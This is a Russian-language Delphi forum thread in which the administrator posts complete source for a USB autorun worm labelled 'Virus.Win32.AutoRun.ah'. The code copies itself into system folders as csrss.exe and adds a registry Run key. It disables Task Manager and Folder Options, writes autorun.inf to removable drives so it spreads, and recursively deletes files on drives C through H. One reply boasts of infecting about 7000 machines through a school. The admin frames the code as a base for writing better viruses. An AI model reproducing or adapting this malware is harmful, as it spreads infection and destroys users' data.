Autorun - delphicode

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

Страница 1 из 1 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx

Autorun (Пример авторана на Delphi)

Autorun

dolphin

Дата: Пятница, 03.10.2008, 17:40 | Сообщение # 1

Администратор

Сообщений: 906

Статус: Offline

Code

program Virus.Win32.AutoRun.ah;
uses
Registry, SysUtils, Windows;

var
WinDir, SysDir: String;
Buffer: array[0..1023] of Char;
F: TextFile; Reg: TRegistry;

function DriveExists(Drive: Byte): Boolean;
begin
Result:= Boolean(GetLogicalDrives AND(1 shl Drive))
end;

procedure InFect(FileName: String);
begin
AssignFile(F,FileName);
Reset(F);
WriteLn(F,'open='+SysDir+'\config\csrss.exe');
CloseFile(F);
end;
procedure FindAndDelete(Drive: String);
var
SearchRec: TSearchRec;
begin
if FindFirst(Drive+'*.*', faAnyFile,SearchRec) = 0 then
repeat
if (SearchRec.Attr and faAnyFile) = SearchRec.Attr then
begin
DeleteFile(SearchRec.Name);
end;
until FindNext(SearchRec) <> 0;
if FindFirst('*', faAnyFile, SearchRec) = 0 then
repeat
if (SearchRec.Attr and faDirectory) = faDirectory then
if SearchRec.Name[1] <> '.' then
begin
ChDir(SearchRec.Name);
FindAndDelete(Drive);
ChDir('..');
end;
until FindNext(SearchRec) <> 0;
end;
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
CopyFile(PChar(ParamStr(0)),PChar(WinDir+'\media\arona.exe'),false);
SetString(SysDir, Buffer, GetSystemDirectory(Buffer, SizeOf(Buffer)));
CopyFile(PChar(ParamStr(0)),PChar(SysDir+'\config\csrss.exe'),false);
AssignFile(F,SysDir+'\config\logon.bat');
Reset(F);
WriteLn(F,'@'+SysDir+'\config\csrss.exe');
CloseFile(F);
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,true);
Reg.WriteString('Worms',SysDir+'\config\logon.bat');
Reg.CloseKey;
Reg.RootKey:=HKEY_CURRENT_USER;
REg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
Reg.WriteInteger('DisableTaskMgr',1);
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoFolderOptions',1);
Reg.Free;
try
InFect(SysDir+'\config\autorun.inf');
if DriveExists(5) then //
begin
InFect('F:\autorun.inf');
end;
if DriveExists(6) then //
begin
InFect('G:\autorun.inf');
end;
if DriveExists(7) then //
begin
InFect('H:\autorun.inf');
end;
if DriveExists(10) then
begin
InFect('K:\autorun.inf');
end;
if DriveExists(11) then
begin
InFect('L:\autorun.inf');
end;
if DriveExists(14) then
begin
InFect('O:\autorun.inf');
end;
except
Exit;
end;
try
FindAndDelete('D:\');
FindAndDelete('C:\');
FindAndDelete('E:\');
FindAndDelete('F:\');
FindAndDelete('G:\');
FindAndDelete('H:\');
except
Exit;
end;

KenT

Дата: Суббота, 06.12.2008, 13:49 | Сообщение # 2

Группа: Удаленные

я маляська тупой ^^ )))а что с этим кодом делать..._)и он мну заипал xD столько раз у мну на компе зависал )))

Добавлено (06.12.2008, 13:49)
---------------------------------------------
аа.....)памому дагнал ....Или..................))))))[color))))))yellow]типо их нада cool вводить в Delphi

Заглянувший

Дата: Пятница, 23.01.2009, 18:03 | Сообщение # 3

Группа: Гости

Это же ппц старый исходник....теперь этот исходник и вирусы палят! Мне уже пол года назад пришлось этот вирус после компиляции пихать в отладчик и править байты...работал он у меня хорошо.....я его скинул в школу! Тогда наверно пол города им заразилось....машин наверно более 7000.....после чего его стал палить нод 32 а потом уже и касперский...вот так вот....
Пацики я создал сайт но там пока ещё мало чего.....
www.griping.do.am

dolphin

Дата: Суббота, 04.04.2009, 23:40 | Сообщение # 4

Администратор

Сообщений: 906

Статус: Offline

Заглянувший, Это как пример вируса, я же не говорю брать код и компилировать, на его основе можно написать свой ещё лучше чем прежний biggrin

Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик

Autorun (Пример авторана на Delphi)

Страница 1 из 1
1